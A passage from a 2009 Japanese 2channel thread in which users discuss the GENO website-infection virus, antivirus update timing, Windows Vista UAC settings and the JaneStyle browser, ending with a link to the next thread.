932名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:17
>>922
そんな状態なら無効にして無いのかもな
933名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:19
Norton先生はさっきからひっきりなしに更新してるわ
934名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:24
>>926
まだ来てないっぽい
935名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:29
>>922
おまw
UACでググれよ
936名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:44
このスレ以外インターネットのどこでも盛り上がってないけど、
これって達の悪いジョークとかじゃないの???
937名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:02
>>905
凄いなそれ。OS標準の保護を無効にさせるアプリケーションかよ。
UACがそういうアプリを駆逐してくれるはずなんだがなあ。

>>916
まあまあ、別にハンカチでドアノブ掴んだっていいじゃねえか。
キレイ好きなのは悪いことじゃないだろ。とりあえず手洗わない奴多すぎだし。
938名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:05
>>917
sqlsodbc.chmが改変されるのはウィルスがバージョンチェックの目印にしてるだけっぽいから
既に感染していたり他の所にチェックを入れるウィルスの亜種だと意味無いのでは?
939名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:18
live one careはのんびりやで〜
940名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:20
>>936
このスレよりもっと盛り上がってるところが別にあるけどね。
941名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:27
ファミ
942名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:28
>>924
すいません

>>929
そういうものなんですか
たまに盾みたいなアイコンが出るあれがそうですか?
943名無しさん@お腹いっぱい。:2009/05/17(日) 00:47:34
>>934
そう…ありがとう…なんか辛いよ…
944名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:01
>>936
おまえのインターネットって、ずいぶん狭い世界なんだな
945名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:00
我らがavastさんはまだか!
946名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:08
>>907
アメリカいったら発狂するぞw
947名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:17
>>941
途中送信しちまった
ファミ通も感染したらしいしやばいな
948名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:30
>>905
JaneStyle使いは負け組みケテーイ
949名無しさん@お腹いっぱい。:2009/05/17(日) 00:48:49
>>936
じゃあ感染URL踏んでらっしゃい
950名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:01
ノートンのさっきの更新がこれに対応したものなのかどうか
試そうにも違ったら困るので試せないw
951名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:02
>>945
なんかavast!さん結構前から入ってるとか聞いたけど
952名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:13
一回でもいいのでTVで報道してくれないものか
953名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:23
>>947
スレ嫁よ
確認した奴が感染してないっていってるだろ
954名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:23
>>947
してませんが
955名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:27
>>936
ジョークなら良かったのにね
つかJaneの作者UAC切れとか言ってたんだ
気づかなかったけどVistaで普通に使えてたw
あー気づかなくて良かったあああ
956名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:29
>>947
それデマ
957名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:31
カスペ更新キタ
958名無しさん@お腹いっぱい。:2009/05/17(日) 00:49:45
先生ならあるいはまた日付だけの更新やもしれぬ・・・!
959名無しさん@お腹いっぱい。:2009/05/17(日) 00:50:08
お? ノートンまた更新キタのか
でも概略じゃ内容がサッパリわからないぜ
960名無しさん@お腹いっぱい。:2009/05/17(日) 00:50:16
先生更新きたけど、これ関連の更新なのかがわかんねぇw
961名無しさん@お腹いっぱい。:2009/05/17(日) 00:50:28
>>950
さっきの・・・?
962名無しさん@お腹いっぱい。:2009/05/17(日) 00:50:33
先生が真の力を発揮するのは再起動を要求する時だけ
963名無しさん@お腹いっぱい。:2009/05/17(日) 00:50:33
>>715
うしろ薄暗くなって許可かキャンセルかの警告出る。
ソフトによってはUACの所為で起動時糞重くなったり(韓国製FPSとかでよくある)するから切ってる奴多数
964名無しさん@お腹いっぱい。:2009/05/17(日) 00:51:11
そういえば感染するとうpだてがブロックされるとか何とかいってなかったっけ
965名無しさん@お腹いっぱい。:2009/05/17(日) 00:51:37
>>937
どうやらJaneStyleは設定ファイルの保存場所までProgramFilesの中でやっちゃって動作に仕様が出るらしい。
Vistaが出た当初から言われてんだが今日までずっと対策してない。
最近アップデートされたんだがやったのはアフィリンクとYahooツールバーの強制添付だけ。
966名無しさん@お腹いっぱい。:2009/05/17(日) 00:51:57
>>962
うん、Genoにまともに対応できるとしたらエンジンのアップデート必須
だろうね。
967名無しさん@お腹いっぱい。:2009/05/17(日) 00:52:11
>>910
アウアウだな
968名無しさん@お腹いっぱい。:2009/05/17(日) 00:52:29
>>963
それですか
じゃあうちのPCはオンになってるんですねUAC
969名無しさん@お腹いっぱい。:2009/05/17(日) 00:52:52
>>965
企業になったらやっぱりお金稼ぎがメインになるのね
970名無しさん@お腹いっぱい。:2009/05/17(日) 00:52:56
先生の普段のうpだてって何をしてるのか分からん
971名無しさん@お腹いっぱい。:2009/05/17(日) 00:53:22
企業まで感染するって
PCにセキュリティ対策ソフトって普通入れるもんじゃないの?
972名無しさん@お腹いっぱい。:2009/05/17(日) 00:53:43
Vistaの軽量化対策→UACをOFF
973名無しさん@お腹いっぱい。:2009/05/17(日) 00:53:59
>>970
ちゃんと使ってくれてるかの生存確認です
先生自体は死んだままだけどな!
974名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:10
この流れ見てるとやっぱUACがデフォルトで有効だったのは大正解だと思うわ。

>>965
JaneStyleの開発力マジパネェ金の亡(ry
975名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:11
とにかくGENOのやつらはマジで首吊れ!
976名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:17
>>971
対策される前に入ったらアウトだろ。つまりそういうことだったんじゃね
977名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:25
>>965
そうだったのか…
その発言今知った
知らなくてよかった
978名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:31
>>971
このスレちゃんと読んだか?
979名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:46
>>971
カカクコム事件とか知らないの? 馬鹿なの?
980名無しさん@お腹いっぱい。:2009/05/17(日) 00:54:56
普段見てるサイトが感染してたら終わりじゃんかよ
981名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:08
誰か、次スレヨロシク
立てられなかった
982名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:31
>>971
小さい企業だとパソコン買ったまま使い続けている場合も多いよ。
対策ソフトの期限切れアラートが出っ放しとかよくある。
983名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:35
ウイルス対策ソフトが重いときの回避策でオフで切り抜けるってのも駄目だ
984名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:35
avast入れてたら自前に対策できてただろうね
985名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:46
とりあえず現在対応してるソフトまとめようず!
986名無しさん@お腹いっぱい。:2009/05/17(日) 00:55:54
ノートン定義ファイルのところに更新したってのってねえぞ。
987名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:04
どうやってサイトが改ざんされるの?
FTPパス抜かれてうんぬん?
988名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:10
バスター厨か?
989名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:17
>>981
テンプレこのままでいいのかな?
それだったらこのまま立ててくるし
990名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:34
Style使ってるけど、設定とか全部同じフォルダの中だぞ
古いアーカイブからうpして使ってるからかな

UACはNorton UAC Toolってのが使いやすいらしい
991名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:35
>>971
まともな企業は導入しているソフトウェアのバージョンなども含めて、
セキュリティに十分な対策を講じていますが、問題はそのような企業が(ry
992名無しさん@お腹いっぱい。:2009/05/17(日) 00:56:48
>>987
そう
993名無しさん@お腹いっぱい。:2009/05/17(日) 00:57:25
>>910
995までに立たなかったら立ててくる
994名無しさん@お腹いっぱい。:2009/05/17(日) 00:57:51
>>951
最新の亜種に対策ってされたっけavast
995名無しさん@お腹いっぱい。:2009/05/17(日) 00:57:51
>>938
>>他の所にチェックを入れるウィルスの亜種
もうそんなものが・・・
nLiteでいろいろいじったXPのせいか
sqlsodbc.chmが最初から存在しないんだけど
安心はできないのね
996名無しさん@お腹いっぱい。:2009/05/17(日) 00:57:57
>>989
このスレの間では気になるところはチラホラとあったけど
基本的には特に変化は無かったはず
よろしく!
997名無しさん@お腹いっぱい。:2009/05/17(日) 00:58:01
先生目覚めてくれ・・・
998名無しさん@お腹いっぱい。:2009/05/17(日) 00:58:05
>>990
元々レジストリとか使わないから適当なフォルダに突っ込んでも問題無いんだよな
それをわざわざシステムフォルダへ入れようとするんだから頭悪い
999名無しさん@お腹いっぱい。:2009/05/17(日) 00:58:20
次スレ
GENOウイルススレ ★9
http://pc11.2ch.net/test/read.cgi/sec/1242489450/
1000名無しさん@お腹いっぱい。:2009/05/17(日) 00:58:21
1000ならネット壊滅
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。